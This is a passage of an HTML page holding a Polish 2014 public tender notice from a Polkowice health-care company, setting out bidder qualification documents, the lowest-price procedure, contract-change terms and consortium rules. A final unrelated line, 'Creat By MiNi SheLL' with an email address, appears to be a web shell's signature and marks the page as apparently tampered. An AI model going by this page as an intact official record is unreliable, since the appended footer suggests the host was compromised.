warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów załączonych do oferty na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym, jeżeli złoży oświadczenie sporządzone wg załącznika nr 1 do Rozdziału I SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu          o oświadczenie, sporządzone wg załącznika nr 1 do rozdziału I SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli złoży oświadczenie sporządzone wg załącznika          nr 1 do Rozdziału I SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia            w oparciu o oświadczenie, sporządzone wg załącznika nr 1 do rozdziału I SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej                  i finansowej, jeżeli złoży oświadczenie sporządzone wg załącznika nr 1 do rozdziału I SIWZ. Warunek będzie oceniany według formuły spełnia/nie spełnia w oparciu o oświadczenie, sporządzone wg załącznika nr 1 do rozdziału I SIWZ złożone przez Wykonawcę w celu potwierdzenia spełniania warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">zaświadczenia niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym, a w szczególności:
Certyfikaty i inne dokumenty dopuszczające aparat do  użytkowania na terenie Polski  i UE wymagane obowiązującymi przepisami prawa, jak: atest , certyfikaty CE, deklaracje zgodności - zgodnie z Ustawą z dnia 20 kwietnia 2004 roku o wyrobach medycznych (Dz. U. Nr 93, poz. 896 z późniejszymi zmianami)</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy wtedy, gdy: 
1. termin realizacji ulegnie wydłużeniu z przyczyn leżących po stronie Zamawiającego.
2. jakieś zdarzenie bądź ciąg zdarzeń obiektywnie niezależnych od Zamawiającego                  lub Wykonawcy (których Zamawiający i Wykonawca nie mogli przewidzieć i którym nie mogli zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działania z należytą starannością) zasadniczo utrudni wykonanie części zobowiązań umowy, bądź wpłynie na brzmienie zapisów       w umowie;  
3. Na okoliczność o których mowa w pkt 1 i 2 zostanie sporządzony aneks do umowy                         z Wykonawcą</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcuz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polkowickie Centrum Usług Zdrowotnych ZOZ S.A. ul. K. B. Kominka 7,                              59-101 Polkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2014 godzina 11:00, miejsce: Oferty winny być złożone w siedzibie Zamawiającego w Polkowickim Centrum Usług Zdrowotnych ZOZ S.A., ul. K.B. Kominka 7, 59-101 Polkowice (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Podwykonawstwo:                          W przypadku realizacji części przedmiotu zamówienia za pomocą podwykonawców, Zamawiający żąda wskazania w ofercie tych części (załącznik nr 3 do formularza oferty). 2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. jako konsorcjum, spółka cywilna). W takim przypadku ich oferta musi spełniać następujące wymagania:             1) Wykonawcy występujący wspólnie (konsorcja) muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie musi wynikać z treści pełnomocnictwa. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania. 2) Wykonawcy przedłożą wraz z ofertą pełnomocnictwo wszystkich stron, cel działania, sposób ich współdziałania, zakres prac przewidzianych do wykonania przez każdego z nich sposób odpowiedzialności (wymaga się solidarnej odpowiedzialności wykonawców),                         3) w odniesieniu do wymagań określonych w ustawie, każdy z przedsiębiorców wchodzący w skład konsorcjum musi złożyć oświadczenie, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 1-8, zaś podmioty zbiorowe dodatkowo pkt. 9 ustawy,                 4) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie                                z pełnomocnikiem (liderem konsorcjum), 5) wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na wykonawcę; w miejscu, np. nazwa i adres wykonawcy, należy wpisać dane dotyczące wszystkich uczestników konsorcjum, a nie tylko pełnomocnika konsorcjum. 6) na podstawie rozporządzenia Prezesa Rady Ministrów z 19.02.2013 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231) § 7 ust. 2, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 3. Poleganie na zasobach innych podmiotów 1) Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji wykonawca zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował niezbędnymi zasobami przez cały okres realizacji zamówienia. 2) Zgodnie z art. 22 ust.2a ustawy, Zamawiający żąda, aby w takiej sytuacji wykonawca przedstawił dokumenty potwierdzające spełnienie warunku opisanego w pkt. 6.2 - 6.5 specyfikacji oraz złożył pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 3) Zamawiający uznaje, że w sytuacji gdy wykonawca nie posiada własnej wiedzy i doświadczenia to korzystanie z obcej wiedzy i doświadczenia możliwe jest wyłącznie poprzez złożenie oferty wspólnej, względnie ewentualne zlecenie części zamówienia podwykonawcy, który wymaganą wiedzę i doświadczenie posiada.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com